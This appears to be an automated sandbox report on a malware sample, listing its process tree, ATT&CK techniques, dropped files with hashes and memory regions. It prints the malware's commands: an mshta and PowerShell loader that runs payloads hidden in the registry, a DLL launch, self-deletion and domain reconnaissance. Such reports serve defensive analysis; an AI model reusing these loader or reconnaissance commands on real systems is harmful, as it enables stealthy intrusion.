PID 2708 wrote to memory of 2712	2708	Explorer.EXE	cmd.exe
PID 2708 wrote to memory of 3308	2708	Explorer.EXE	WinMail.exe
PID 2708 wrote to memory of 3308	2708	Explorer.EXE	WinMail.exe
PID 2708 wrote to memory of 3308	2708	Explorer.EXE	WinMail.exe
PID 2708 wrote to memory of 3308	2708	Explorer.EXE	WinMail.exe
PID 2708 wrote to memory of 3308	2708	Explorer.EXE	WinMail.exe
PID 2708 wrote to memory of 3388	2708	Explorer.EXE	cmd.exe
PID 2708 wrote to memory of 3388	2708	Explorer.EXE	cmd.exe
PID 2708 wrote to memory of 3388	2708	Explorer.EXE	cmd.exe
PID 2708 wrote to memory of 3388	2708	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3552

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
2⤵
PID:4616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4348

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\explorer.exe
explorer .
4⤵
PID:1292

C:\Windows\system32\cscript.exe
cscript 1.vbs
4⤵
PID:1972

C:\Windows\system32\notepad.exe
notepad 1.txt
4⤵
PID:2316

C:\Windows\system32\findstr.exe
findstr txt 1.txt
4⤵
PID:2428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c get-filehash -al sha256 .\perpetuity.mng
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3936

C:\Windows\system32\rundll32.exe
rundll32 perpetuity.mng,DllRegisterServer
4⤵
- Suspicious use of WriteProcessMemory
PID:4520

C:\Windows\SysWOW64\rundll32.exe
rundll32 perpetuity.mng,DllRegisterServer
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4584

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yiro='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yiro).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\49ABAB98-14BC-6378-668D-8847FA113C6B\\\StopSettings'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\49ABAB98-14BC-6378-668D-8847FA113C6B").PlayText))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:840

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ne5fir5m\ne5fir5m.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4D2.tmp" "c:\Users\Admin\AppData\Local\Temp\ne5fir5m\CSC2E7AD268DBFD48A9A1511BE6C74F2F7.TMP"
5⤵
PID:2060

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\djnkly3q\djnkly3q.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF5BC.tmp" "c:\Users\Admin\AppData\Local\Temp\djnkly3q\CSCA965C2052B274EBF8916A6D760C340C0.TMP"
5⤵
PID:1008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\perpetuity.mng"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:980

C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\4EE5.bi1"
2⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
3⤵
PID:2976

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4EE5.bi1"
2⤵
PID:2712

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:3308

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:3388

C:\Windows\system32\cmd.exe
cmd /C "Net group "Domain Admins" /domain >> C:\Users\Admin\AppData\Local\Temp\2CBC.bin1"
2⤵
PID:4204

C:\Windows\system32\net.exe
Net group "Domain Admins" /domain
3⤵
PID:4880

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "Domain Admins" /domain
4⤵
PID:2324

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2CBC.bin1"
2⤵
PID:1968

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\2CBC.bin1 > C:\Users\Admin\AppData\Local\Temp\2CBC.bin & del C:\Users\Admin\AppData\Local\Temp\2CBC.bin1"
2⤵
PID:4644

C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:3080

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3840

C:\Windows\system32\more.com
more
3⤵
PID:4064

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:2876

C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:216

C:\Windows\system32\systeminfo.exe
systeminfo.exe
3⤵
- Gathers system information
PID:2728

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:3696

C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:4344

C:\Windows\system32\net.exe
net view
3⤵
- Discovers systems in the same network
PID:4400

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:1268

C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:3908

C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
3⤵
PID:2340

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:1028

C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:1352

C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
3⤵
- Enumerates processes with tasklist
PID:2864

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:4956

C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:1384

C:\Windows\system32\driverquery.exe
driverquery.exe
3⤵
PID:5012

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:3452

C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:4292

C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
3⤵
PID:2384

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:2200

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\477A.bin1 > C:\Users\Admin\AppData\Local\Temp\477A.bin & del C:\Users\Admin\AppData\Local\Temp\477A.bin1"
2⤵
PID:4584

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:848

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\1\" -spe -an -ai#7zMap21497:82:7zEvent7535
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1720

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\55557.txt"
2⤵
PID:3696

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1268

C:\Windows\system32\calc.exe
calc.exe
1⤵
- Process spawned unexpected child process
- Modifies registry class
PID:4824

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4592

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
010c219c46b4439bc787644989e20389

SHA1
f3a63066ab4446458bd6417386777e39e09b9b25

SHA256
2a7c264d94398912c720de578b6d959b2457582182b8f2cc98281f27ef6701aa

SHA512
c6967d2a37b9a45f491138b638d99e5fa09ef38f680c887bfbc2336c683deae86f4d6626f6defc8c0aabccf545923a708df05825de8102086a8f333a58e74963

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1047c3128bb0cb72377edfbd023dc3f8

SHA1
e8d17c186ef68ead088712b4cb0dd1be0eb52467

SHA256
c2a481814ebf84a6431b1d4a570b472fe0f0ec81369a4935d0c6c32e55ee2c6f

SHA512
6416121cbe7babe221784fbfe975ffd08f8b052b0448cf602dd91caf3287dc2a3b1275b0ad462ed9707f88bfe101e65fce830fc63da54cb4ab2390adab3c8802

Download Submit
C:\Users\Admin\AppData\Local\Temp\1\1.txt
MD5
bca860d309eb8ccb5381295994984f43

SHA1
89e23d1d37c918a62d72794c27e66ab30c0d1f11

SHA256
340cea03cffc4a6be6c057b0fd80331df6353d8f41f3acf9e5ef34ae741fa27c

SHA512
6c0e5b27bfb473c26f19c5c0033c11d348c2a87ef5cf288cc446c593ed1bcf0e2e29a25d83413eb7535d43653d3cfcd2bbf43f19df066ed6181953dddb29c015

Download Submit
C:\Users\Admin\AppData\Local\Temp\1\1.vbs
MD5
6109b7b8c66e1fa2ca22ca6333a16326

SHA1
1e26c5b5aa0e5a689fce9574f3303c7b209055b6

SHA256
e2f49457df066ac697a70a6130560dd594ce492d2db624a93157ab3487068565

SHA512
d5d5808a05d296b96eefc410ddff14c565d1518d387048dc7ae5c073280131d92297f02919ab56acee4912c34e797081a5a53ed4ac8f83b6d4434ae1bcba0692

Download Submit
C:\Users\Admin\AppData\Local\Temp\1\documentation[255275].vbs
MD5
6cd2d52d5d366df6f397e331b5dc172d

SHA1
60a206bbd854e59df05b144c5367ac3ba50b72b3

SHA256
744a16eedca8bd26333e0a8bb9cf563fb8079196ca2745769fc06e08c991ffcf

SHA512
01eb430016ddc31b5232bb28f3eb6cad9adeaafaacda62673496125a6c4d61fe703f9ee7265e7d7d33f15c768947e9ba53afcda012d81eed424b16375a07f00f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2CBC.bin
MD5
eaa4fcbc83806923069b87f8bf5c838d

SHA1
89a1af1181755aa43f763551e0c7f4196bd39951

SHA256
6c6349c8773264c90e718e40d6f3f2318fa542703d2cf26d23a10a1390c11552

SHA512
ee48fd7a048a1256364d10c10324a1c7f244d556fc4053136030d076b7d329a5d7da59d7148d16fe7ec8eb45552452d0d0bc763d21f26e3aa311c91cb4beb8e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2CBC.bin1
MD5
eaa4fcbc83806923069b87f8bf5c838d

SHA1
89a1af1181755aa43f763551e0c7f4196bd39951

SHA256
6c6349c8773264c90e718e40d6f3f2318fa542703d2cf26d23a10a1390c11552

SHA512
ee48fd7a048a1256364d10c10324a1c7f244d556fc4053136030d076b7d329a5d7da59d7148d16fe7ec8eb45552452d0d0bc763d21f26e3aa311c91cb4beb8e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2CBC.bin1
MD5
eaa4fcbc83806923069b87f8bf5c838d

SHA1
89a1af1181755aa43f763551e0c7f4196bd39951

SHA256
6c6349c8773264c90e718e40d6f3f2318fa542703d2cf26d23a10a1390c11552

SHA512
ee48fd7a048a1256364d10c10324a1c7f244d556fc4053136030d076b7d329a5d7da59d7148d16fe7ec8eb45552452d0d0bc763d21f26e3aa311c91cb4beb8e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin
MD5
bbe0bc7f4b186fa417d667c1be4fe086

SHA1
7cbcb71de8b150147db77b06205c984698d7768a

SHA256
5b94dc124e4627f45a311125b814b3fa95709d4089c081bff9ee5d5b25ad51c7

SHA512
56d6e9f83fe83c89c4e6ec3493a4cd8097337880ae567eb40504520593b5efab40055234e28e583738b2738d2aef59d563ef211eafad282d80222b4fd9ac5c1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
1d0b80729108e13e765fa8b5dbc325b0

SHA1
155a3f53b166d45c70f4444c2603b6ceb95d4f9e

SHA256
4078dfa5ba175d50a27b6f7d1eb134da661cf559038b601986bc27beddb3a59b

SHA512
f3adc98b8a9288f80bf023cb691cf4d8e78fa7fa5e6e22eced1c6dcec9ea0e842fef609a06c92d2cd3d7c572e60aaaa4bb0a5821ab987b53f8ac68561b240b94

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
f7aea2435aa888b709ca20f816c33bfd

SHA1
38717c9a73b5f8bd399839cbe0aa57518427e758

SHA256
f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

SHA512
1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
1546d4a0bc204a848d5372dc043d253d

SHA1
cc9f4b6115ed4900a7846e1bb2e3dadb59888b43

SHA256
ff17262a8255f2d0c913669c54b785c8120b1c093fe63562b36f947c7d2c60c9

SHA512
2b4364e831c2c9bf254c5ce54b814de2ab9b3f10aa9d515aa30371266fa6b5e925334ea9bdade190fcabf86f73352fbfef95469356b0c5485867da1fa31e6c2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
014e75d073811f27fc6087514a2f297b

SHA1
61177b262c0f4190c3ded7d44311b082a1caf47b

SHA256
594e7f91978de7acb3112b327dd09daae64acbdcea2aaca92abc36ed7ced8e76

SHA512
6d7220853c534ea5639ec8a09a2137095c0faf358a7fa832521bc911026445cc46dbad5fb6750777c9605e898294b039f9f8083372665187ab16ff4e82afa4d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
265b8461ad2c606cec055e7f0d7a0d36

SHA1
6bba80b158aeaa8ec1b61f23a5b796c783f93700

SHA256
cac58225ba58c77c59df6721673828a0390eb17df40b34905f3c769b2964da95

SHA512
c39075badbe39aa7d091a4686eebe7f6e61d56a55fea2e0ab25e36b97d76b10f5192229584869621d5f1d6f312a170683423c724cc5c39d1fd4cd1ed5feadd3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
265b8461ad2c606cec055e7f0d7a0d36

SHA1
6bba80b158aeaa8ec1b61f23a5b796c783f93700

SHA256
cac58225ba58c77c59df6721673828a0390eb17df40b34905f3c769b2964da95

SHA512
c39075badbe39aa7d091a4686eebe7f6e61d56a55fea2e0ab25e36b97d76b10f5192229584869621d5f1d6f312a170683423c724cc5c39d1fd4cd1ed5feadd3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
92753f8306d00df5e989ae74fb166943

SHA1
c54bb778ecd90cd4d603a718591324b8e4dbba5e

SHA256
51d63dcbad3cbc4cdd30bed1fec8a28d9d60e81c64b4ae0f21237f7c47ff5678

SHA512
f774cd85eabf99dc0604d2a0a12abcb6681962d54883c37fee75264cab5baf3f5fd9730530bbcf3585c71ef25ead00fb89deae44e06de1b4b9ccf507721278c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
92753f8306d00df5e989ae74fb166943

SHA1
c54bb778ecd90cd4d603a718591324b8e4dbba5e

SHA256
51d63dcbad3cbc4cdd30bed1fec8a28d9d60e81c64b4ae0f21237f7c47ff5678

SHA512
f774cd85eabf99dc0604d2a0a12abcb6681962d54883c37fee75264cab5baf3f5fd9730530bbcf3585c71ef25ead00fb89deae44e06de1b4b9ccf507721278c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
2a8b3bbf8384df48aa537cdd414fa194

SHA1
a0c9ffc4aba20cd5816c1d0defcf4a369546bfcd

SHA256
ad931f2cb43b004cc4a196a71806fdcc041152d59867e4afec5831b324b18aa6

SHA512
951a1e3ccfd4f6a23bcf82548fc52e721a148421ea861b088624d6729aade1cce879505ded0a577a4e60c928318779f7e01f0cb97a53b22f89953ff84d2852af

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
2a8b3bbf8384df48aa537cdd414fa194

SHA1
a0c9ffc4aba20cd5816c1d0defcf4a369546bfcd

SHA256
ad931f2cb43b004cc4a196a71806fdcc041152d59867e4afec5831b324b18aa6

SHA512
951a1e3ccfd4f6a23bcf82548fc52e721a148421ea861b088624d6729aade1cce879505ded0a577a4e60c928318779f7e01f0cb97a53b22f89953ff84d2852af

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
1fb0a9babe82bb26b6f0b5d8124e919b

SHA1
a5536a6ee6e6d930eea0831db591778c96602d75

SHA256
2e221820226f41918f8e3955969abb9d4289100c58876a379a05d83770cbbc93

SHA512
515fb754f62c2152a6e711196ad623b5095eee5e5727f4b27726f7184606402d6603607c84231e349173f008bce5533b89dfc8ae2a98be676cdb949a6473405c

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
2ee61aee330e233e3f0be0fe33d48212

SHA1
7e6069bcf87d6491faca6e4cef68e64243f97d34

SHA256
45f2c26e509ac0527917475393bb21a0ba89d617533ab35d795215f9bec3c486

SHA512
4404a9489bcafe0b02ae10364d5cdb99de083444513c537370c23ae81bf274156241dab1dd056dac592d45b1dfe043d9015e25831604e22bc119420866789776

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
bbe0bc7f4b186fa417d667c1be4fe086

SHA1
7cbcb71de8b150147db77b06205c984698d7768a

SHA256
5b94dc124e4627f45a311125b814b3fa95709d4089c081bff9ee5d5b25ad51c7

SHA512
56d6e9f83fe83c89c4e6ec3493a4cd8097337880ae567eb40504520593b5efab40055234e28e583738b2738d2aef59d563ef211eafad282d80222b4fd9ac5c1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\477A.bin1
MD5
bbe0bc7f4b186fa417d667c1be4fe086

SHA1
7cbcb71de8b150147db77b06205c984698d7768a

SHA256
5b94dc124e4627f45a311125b814b3fa95709d4089c081bff9ee5d5b25ad51c7

SHA512
56d6e9f83fe83c89c4e6ec3493a4cd8097337880ae567eb40504520593b5efab40055234e28e583738b2738d2aef59d563ef211eafad282d80222b4fd9ac5c1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\4EE5.bi1
MD5
4f6429322fdfd711b81d8824b25fcd9c

SHA1
f7f917b64dd43b620bacd21f134d430d3c406aec

SHA256
d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8

SHA512
e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816

Download Submit
C:\Users\Admin\AppData\Local\Temp\4EE5.bi1
MD5
4f6429322fdfd711b81d8824b25fcd9c

SHA1
f7f917b64dd43b620bacd21f134d430d3c406aec

SHA256
d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8

SHA512
e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF4D2.tmp
MD5
a923beed844c743af43e0766a02e0217

SHA1
9c8009c36d36fa1b4c3a1287362287a97e692702

SHA256
7028856b23bfe6764a37a3fd4ceb692aa1250ebc7eeca2ecd6a19e08a31703eb

SHA512
bf2d06c78bd1d924827fcfca3d767fab4eae724f140e0a1998110dbb8798401e40c4f4c8d129cd45cf043598cb096b555f42c96e1280e2dba05bbb6db6e39a6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF5BC.tmp
MD5
186ce2a2cb9ea563df3b6230f3f7db49

SHA1
e36c537d6d0d7f248ca5aada148cf63f1d9ef4ca

SHA256
63680b243b0d529b97112a26e04d7fe754c07e22035aa662b790a16d35155de6

SHA512
6b40978b160ee4d7240fa806189463fde2c9c7a60be2cb0f0480f3d3f0eaeee6e4fb95a623707447f6afd608d36d5165cc75cad3a95ac649cea73e2fb26b9aef

Download Submit
C:\Users\Admin\AppData\Local\Temp\djnkly3q\djnkly3q.dll
MD5
bdd29f671f935333d56a383a7f7a4a49

SHA1
97810342ef5e13e9a4cbc424807271529073f567

SHA256
ca1cda7f61964f4153d86451660a324d4794e5f19c941c5336cf413191c08bd5

SHA512
2cea6d8c094adfc43b8ed8a7d573cb546b476668264246a6f5870a367a4ea5cbcab67f518e36ce3309fb225be6e9e5f3c1b6b836546489ab008a341f40fec7f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ne5fir5m\ne5fir5m.dll
MD5
cbc62302f19073a90ff4441e24edae21

SHA1
f08bffb0f85f264dadadd1ba7829591e8ecdcbb4

SHA256
7a15d36cbc19939c875de1c61afb2ff605ade8242f6d489dc15b41e6b866d0a7

SHA512
1e7da51fb18e433fafae0a20071fa0889347f5ecec8b09adcf53780435b5acbc5d0cf484f893b34b67aa57755e26236c5bd98d45ff022e3d44c850b5431a589c

Download Submit
C:\Users\Admin\AppData\Local\Temp\perpetuity.mng
MD5
dc48db4d42065b30965be496c7890080

SHA1
d6a73479bb1c320cf951bcd652eb85248e63c9a5

SHA256
e05cb8c1e2a88c8132b25842ceffb198f8a3652fc8461f61af51eaa80c252466

SHA512
eefdaed0ae220867bccb8967d4f08c0868f6b955897dd9ed6fd84a35c180b1ae7b4305da5609ccb666cf2391fa4fcc4d083b2971a28692ddf139b0a1ba0ebcca

Download Submit
C:\Users\Admin\Downloads\55557.txt
MD5
6cd2d52d5d366df6f397e331b5dc172d

SHA1
60a206bbd854e59df05b144c5367ac3ba50b72b3

SHA256
744a16eedca8bd26333e0a8bb9cf563fb8079196ca2745769fc06e08c991ffcf

SHA512
01eb430016ddc31b5232bb28f3eb6cad9adeaafaacda62673496125a6c4d61fe703f9ee7265e7d7d33f15c768947e9ba53afcda012d81eed424b16375a07f00f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\djnkly3q\CSCA965C2052B274EBF8916A6D760C340C0.TMP
MD5
d58e977a2a3afb907dd2d6be6ff4823a

SHA1
b4d83a27f08fafbefcce402bd2a664830029d053

SHA256
1aed0d61e5564952908bdf327c43732fa26347eeeb49264e62d90e01efa80a25

SHA512
430a7f0ae901339daa70a2b07d3ed119b2ade8d41b6fb9a4e95e6ec534b26a6679cf39cafc434a86c3163f4158ae2bd6e0eb38f14fe24c11fe0571f6ebff6205

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\djnkly3q\djnkly3q.0.cs
MD5
7504862525c83e379c573a3c2bb810c6

SHA1
3c7e3f89955f07e061b21107daef415e0d0c5f5e

SHA256
b81b8e100611dbcec282117135f47c781087bd95a01dc5496cac6be334a8b0cc

SHA512
bc8c4ead30e12fb619762441b9e84a4e7df15d23782f80284378129f95fad5a133d10c975795eec6da2564ec4d7f75430c45ca7113a8bff2d1afee0331f13e76

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\djnkly3q\djnkly3q.cmdline
MD5
cbd02919717ec0d40c6ca370c09cd2f4

SHA1
b6ee153e5195378918e9624b1e132b7806aae239

SHA256
9761229d7b60e22598fc9cd183c5707615ed87212d83c474edd29cc9fd3ec5b4

SHA512
e886ee84e09a32ceba6a2b7142f9e43352131ecb52efe8ee2b0f419f1af8a229c5fbc6a094ff72f45caa960e8cb7c9631848714d1945827d418f9418e3231b94

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ne5fir5m\CSC2E7AD268DBFD48A9A1511BE6C74F2F7.TMP
MD5
73ea16cadb30b8fdb4158c35cdf00a71

SHA1
9795e729edbb6c5152a922ca979a3ceaa5b1a691

SHA256
a3b417e447c6d05846427cffcc1df75ac480620b127934d5e516d083762179b8

SHA512
ff0cdcd429af2e90f2e627df13dd18904941805de94ca025250edd0e8365a9c546e162f31b59adf2ef68ad62f2f4228a8a4534e05598a75978bd12d6b43e2e86

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ne5fir5m\ne5fir5m.0.cs
MD5
c08af9bd048d4864677c506b609f368e

SHA1
23b8f42a01326dc612e4205b08115a4b68677045

SHA256
ea46497adae53b5568188564f92e763040a350603555d9aa5ae9a371192d7ae7

SHA512
9688fd347c664335c40c98a3f0f8d8af75aba212a75908a96168d3aebfc2feaab25dd62b63233eb70066dd7f8fb297f422871153901142db6ecd83d1d345e3c2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ne5fir5m\ne5fir5m.cmdline
MD5
3195d0ff79dac08335fdccbb94e18c1d

SHA1
9a37987199be3b7cd66e04384c71149ee4cf5c44

SHA256
71e26eefc56ed87b17f042447869f878e1e96bb341109ee71244dc789fe3dcba

SHA512
3843626de4453aef714f0a3ad8d75f68118b09c6b9c90a390cfb2f52c4d201facb4798ce3af687e24cdd653779aeb805879d14c6741265a55db82d4d831c551f

Download Submit
\Users\Admin\AppData\Local\Temp\perpetuity.mng
MD5
dc48db4d42065b30965be496c7890080

SHA1
d6a73479bb1c320cf951bcd652eb85248e63c9a5

SHA256
e05cb8c1e2a88c8132b25842ceffb198f8a3652fc8461f61af51eaa80c252466

SHA512
eefdaed0ae220867bccb8967d4f08c0868f6b955897dd9ed6fd84a35c180b1ae7b4305da5609ccb666cf2391fa4fcc4d083b2971a28692ddf139b0a1ba0ebcca

Download Submit
memory/216-313-0x0000000000000000-mapping.dmp

Download
memory/840-266-0x0000024F269C0000-0x0000024F269FF000-memory.dmp

Filesize
252KB

Download
memory/840-245-0x0000024F268E0000-0x0000024F268E1000-memory.dmp

Filesize
4KB

Download
memory/840-265-0x0000024F24716000-0x0000024F24718000-memory.dmp

Filesize
8KB

Download
memory/840-236-0x0000024F24710000-0x0000024F24712000-memory.dmp

Filesize
8KB

Download
memory/840-237-0x0000024F24713000-0x0000024F24715000-memory.dmp

Filesize
8KB

Download
memory/840-215-0x0000000000000000-mapping.dmp

Download
memory/840-253-0x0000024F26900000-0x0000024F26901000-memory.dmp

Filesize
4KB

Download
